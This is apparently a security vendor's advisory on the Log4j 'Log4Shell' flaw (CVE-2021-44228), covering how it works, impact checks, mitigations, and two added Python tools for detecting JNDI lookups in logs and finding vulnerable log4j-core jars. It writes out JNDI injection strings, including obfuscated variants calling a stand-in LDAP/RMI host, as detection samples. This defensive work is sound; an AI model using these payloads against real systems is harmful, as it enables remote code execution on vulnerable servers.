Latest on the Log4j 2 Vulnerability, by the Loop Secure SOC
Over the past few days, the Log4j vulnerability has made significant headlines across the cybersecurity industry and mainstream media.
• What is Log4j 2?
• Are you impacted by this vulnerability?
• Remediation
• Proactive Response to Zero-Day Vulnerabilities and cyber-attacks
What is Log4j 2?
Log4j 2 is an open-source Apache logging framework and a commonly used component for logging requests and events within Java applications. The library is embedded in many internet services and applications, including those run by Twitter, Amazon, Microsoft, Google and more. The vulnerability (CVE-2021-44228), also dubbed Log4Shell or LogJam, allows an unauthenticated attacker to execute code remotely by submitting a single string of text that the application ends up logging, for example in an HTTP header or form field. The string carries a JNDI lookup such as ${jndi:ldap://attacker-host/x}; when Log4j formats the log message it resolves the lookup, connects to the attacker-controlled LDAP or RMI server and loads the Java class it points to.
There are numerous proven methods through which an attacker can exploit Log4j, some of which bypass earlier mitigations, so a multi-layered security approach is recommended for a more robust defence. The latest variations of the exploit deliver the payload over HTTP and HTTPS and make detection harder by obfuscating the Java Naming and Directory Interface (JNDI) string itself, for example by nesting lookups (${${lower:j}ndi:...}) or URL-encoding the payload so that a simple match on ${jndi: misses it.
This is assessed as a critical vulnerability with a CVSSv3 score of 10.0: Log4j usage is widespread, the vulnerability is easy to exploit, and successful exploitation yields code execution with the privileges of the Java process, which in practice usually means full control of the compromised host. The vulnerability continues to be actively exploited in the wild, with the majority of attempts coming from automated scanning.
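As an added example (not code from the original post or from the Loop Secure SOC), the following Python detector shows why the obfuscation described above defeats a naive match on ${jndi:, and how to normalise the common evasions (nested ${lower:}/${upper:} lookups, ${...:-default} substitutions and URL encoding) before matching. The log lines are constructed for the example and use documentation IP ranges, not real traffic; the regexes and function names are this example's own, not part of any vendor product.

```python
import re
import urllib.parse

# Constructed sample web-server log lines (documentation IP ranges, not real
# traffic): a plain payload, three obfuscated variants, a URL-encoded one, and
# a benign request that must not match.
SAMPLE_LOG_LINES = [
    '10.0.0.5 "GET /login HTTP/1.1" 200 "User-Agent: ${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 "GET / HTTP/1.1" 200 "User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7/x}"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/o}"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "Referer: ${${env:NOPE:-j}ndi:${env:NOPE:-l}dap://198.51.100.7/y}"',
    '10.0.0.9 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fz%7D HTTP/1.1" 400 "-"',
    '10.0.0.10 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} resolve to x (case does not matter for matching, so
# both collapse to their argument); ${anything:-default} resolves to default.
# Both patterns only match lookups with no nested braces, so applying them
# repeatedly unwraps an expression from the inside out.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The JNDI provider schemes worth flagging once the text is normalised.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding and nested lookup tricks until the text stops changing."""
    current = text
    for _ in range(max_rounds):
        previous = current
        if "%" in current:
            current = urllib.parse.unquote(current)
        current = CASE_LOOKUP.sub(r"\1", current)
        current = DEFAULT_LOOKUP.sub(r"\1", current)
        if current == previous:
            break
    return current


def find_jndi(line):
    """Return the de-obfuscated ${jndi:...} lookup found in a line, or None."""
    normalized = normalize(line)
    match = JNDI_LOOKUP.search(normalized)
    if not match:
        return None
    end = normalized.find("}", match.start())
    return normalized[match.start():end + 1] if end != -1 else normalized[match.start():]


def scan(lines):
    """Return (index, payload) for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        payload = find_jndi(line)
        if payload is not None:
            hits.append((index, payload))
    return hits


if __name__ == "__main__":
    for index, payload in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: {payload}")
```

Running it flags the first five constructed lines and reports each one's decoded lookup, while the plain browser request is ignored. The same normalisation step belongs in front of any SIEM or WAF rule that currently matches only the literal ${jndi: string.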
Are you impacted by this vulnerability?
There is an ever-growing list of impacted manufacturers and components. Click here to see the list and check if your vendors or the products you use are affected.
Our Security Operations Team has put together steps to identify whether you have been impacted by the Log4j vulnerability.
To test whether an application is vulnerable locally, follow the instructions in this link under the Reproducing Locally section.
Our security partners at CrowdStrike and Microsoft have developed methods for detecting hosts that may utilise the Log4j library. If you utilise Microsoft 365 Defender or CrowdStrike Falcon, follow the below steps to check for affected hosts:
CrowdStrike Falcon: Navigate to Host Search under the Investigate section, then hover over the Vulnerabilities section in the top panel to display the Log4Shell Vulnerability Dashboard > Audit of Log4j occurrences by host.
Microsoft 365 Defender: Navigate to Threat Analytics section and locate the CVE-2021-44228 Log4j Active Exploitation > Impacted Assets.
If any hosts or devices use the Log4j 2 library but do not forward logs to a centralised SIEM (Security Information and Event Management) platform, or do not have an EDR (Endpoint Detection and Response) agent installed, you are missing critical visibility over those endpoints and services. Loop Secure is actively monitoring our clients for signs of compromise via this vulnerability.
Remediation
If you have the resources or an IT security team able to remediate this vulnerability, upgrade affected products to Log4j 2.15.0 (the release built from the 2.15.0-rc2 candidate) or later immediately; the earlier 2.15.0-rc1 candidate's fix can be bypassed and should be considered vulnerable. Apache has since published further Log4j 2 releases, so check the project's security page and deploy the latest fixed version rather than 2.15.0 itself.
If upgrading is not possible, implement the following mitigations as a stop-gap. They only disable lookups in log messages, and the Apache project has since stated that they do not cover every configuration, so they do not replace an upgrade:
Versions 2.10 and above:
- Start the JVM with -Dlog4j2.formatMsgNoLookups=true, add log4j2.formatMsgNoLookups=true to a log4j2.component.properties file on the classpath, or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true, to disable lookups in log event messages. Note the -D prefix and the log4j2. namespace: a bare -formatMsgNoLookups=true is not a JVM option and does nothing.
Versions 2.7 and above:
- Replace %m (or %msg) with %m{nolookups} in every PatternLayout in the configuration to prevent lookups in log event messages; a single appender left with a plain %m remains exploitable.
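For hosts without an EDR agent, the check below ties the "Are you impacted?" steps to the version-dependent mitigations above. It is an added example (not tooling from the original post, Loop Secure, CrowdStrike or Microsoft): a Python scanner that walks a directory, opens every jar/war/ear (including jars nested inside WARs and fat jars), identifies copies of log4j-core by their package rather than by file name, reads the version from the Maven pom.properties that log4j-core ships, and maps each copy to the advice in the list above. A copy with JndiLookup.class deleted from the jar is reported as mitigated, since removing that class is the documented mitigation for versions the properties do not cover. The application tree it scans is constructed in a temporary directory from stub jars that mimic log4j-core's layout, so the example runs offline; the status strings and function names are this example's own.

```python
import io
import os
import re
import tempfile
import zipfile

# Layout details of a real log4j-core jar that the scan relies on.
CORE_PACKAGE = "org/apache/logging/log4j/core/"
JNDI_LOOKUP_CLASS = CORE_PACKAGE + "lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing component counts as 0."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def read_log4j_version(jar):
    """Version from the Maven pom.properties log4j-core ships, or None if absent (e.g. shaded jars)."""
    if POM_PROPERTIES not in jar.namelist():
        return None
    match = re.search(r"^version=(\S+)", jar.read(POM_PROPERTIES).decode("utf-8", "replace"), re.M)
    return match.group(1) if match else None


def assess(version, has_jndi_lookup):
    """Map one log4j-core copy to the version-dependent advice above; status strings are this example's own."""
    if not has_jndi_lookup:
        return "MITIGATED_JNDI_LOOKUP_REMOVED"
    if version is None:
        return "UNKNOWN_VERSION_TREAT_AS_VULNERABLE"
    v = parse_version(version)
    if v >= (2, 15, 0):
        return "FIXED_RELEASE_CONFIRM_LATEST"
    if v >= (2, 10, 0):
        return "VULNERABLE_UPGRADE_OR_FORMAT_MSG_NO_LOOKUPS"
    if v >= (2, 7, 0):
        return "VULNERABLE_UPGRADE_OR_NOLOOKUPS_PATTERN"
    return "VULNERABLE_UPGRADE_ONLY"


def inspect_archive(data, label, findings):
    """Inspect an archive held in memory; recurse into jars nested inside WARs and fat jars."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = jar.namelist()
        if any(n.startswith(CORE_PACKAGE) for n in names):  # identify log4j-core by package, not file name
            version = read_log4j_version(jar)
            findings.append({"archive": label, "version": version,
                             "status": assess(version, JNDI_LOOKUP_CLASS in names)})
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(jar.read(name), label + "!" + name, findings)
    return findings


def scan_tree(root):
    """Walk a directory tree and report every log4j-core copy found, nested ones included."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(path, root).replace(os.sep, "/"), findings)
    return sorted(findings, key=lambda f: f["archive"])


def build_zip(entries):
    """Constructed archive from {entry name: content}; used only to fabricate sample jars."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, data in entries.items():
            archive.writestr(name, data)
    return buf.getvalue()


def fake_log4j_core(version, include_jndi_lookup=True):
    """Constructed stand-in for log4j-core: stub entries with the real jar's layout, no bytecode."""
    entries = {POM_PROPERTIES: "version=%s\nartifactId=log4j-core\n" % version,
               CORE_PACKAGE + "LoggerContext.class": b"stub"}
    if include_jndi_lookup:
        entries[JNDI_LOOKUP_CLASS] = b"stub"
    return build_zip(entries)


def demo():
    """Build a constructed application tree in a temp dir, scan it, return {archive: status}."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        samples = {
            "lib/log4j-core-2.14.1.jar": fake_log4j_core("2.14.1"),  # vulnerable, 2.10+
            "lib/log4j-core-2.8.2.jar": fake_log4j_core("2.8.2"),  # vulnerable, 2.7 <= v < 2.10
            "lib/log4j-core-2.14.1-stripped.jar": fake_log4j_core("2.14.1", include_jndi_lookup=False),
            # a WAR bundling a fixed log4j-core plus an unrelated jar that must not be reported
            "app.war": build_zip({
                "WEB-INF/lib/log4j-core-2.15.0.jar": fake_log4j_core("2.15.0"),
                "WEB-INF/lib/unrelated.jar": build_zip({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}),
            }),
        }
        for relpath, data in samples.items():
            with open(os.path.join(root, *relpath.split("/")), "wb") as fh:
                fh.write(data)
        return {f["archive"]: f["status"] for f in scan_tree(root)}
```

Point scan_tree at a real application directory (for example a Tomcat or application-server install) to get the same report for production hosts. Copies found in a fat jar that lacks pom.properties come back with an unknown version and should be treated as vulnerable until the bundled version is confirmed another way.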
Additional remediation suggestions:
- Keep Java up to date on all affected hosts. Current JDK releases disable remote class loading via LDAP and RMI references by default (com.sun.jndi.ldap.object.trustURLCodebase=false), which blocks the simplest exploit chain, but it does not make a vulnerable Log4j safe on its own.
- Consider blocking outbound LDAP, LDAPS and RMI traffic from vulnerable servers to the internet, and alert on attempts: an application server initiating such a connection is a strong indicator of attempted exploitation.
- Deploy multi-layered defence in depth; use defences such as a WAF (Web Application Firewall) and IPS (Intrusion Prevention System) to catch and filter out as many malicious attempts as possible, in addition to SIEM and EDR. Expect obfuscated payloads to get past signature-based filtering, so treat these controls as noise reduction rather than a fix.
Please note that this vulnerability affects a wide variety of software, including SaaS (Software as a Service) solutions and global platforms on which other services rely. Organisations should closely monitor all external assets until it has been confirmed that they are not vulnerable. In some cases, vendors will need to implement updates and mitigations to secure their own products and services.
Proactive Response to Zero-Day Vulnerabilities and cyber-attacks
To proactively secure organisations across multiple industries, Loop Secure provides Australian businesses with 24/7 protection, monitoring and detection of threats to their entire environment through our Managed Detection and Response service. As an extension of your security team, our world-class Security Operations Centre delivers ongoing incident response and continuous monitoring of IT assets.
Our SOC team is ready every minute of the day to hunt through and analyse the behaviours that your IT assets are exhibiting. Their goal is to identify, contain and eradicate threats to your environment. This goes beyond identifying affected IT services for your business: it ensures your most important assets are always secured and protected.
For further information, please use the resources we’ve compiled below:
MITRE: CVE-2021-44228
CrowdStrike: Log4j2 Vulnerability “Log4Shell” (CVE-2021-44228)
Threatpost: New variations and evidence of earlier activity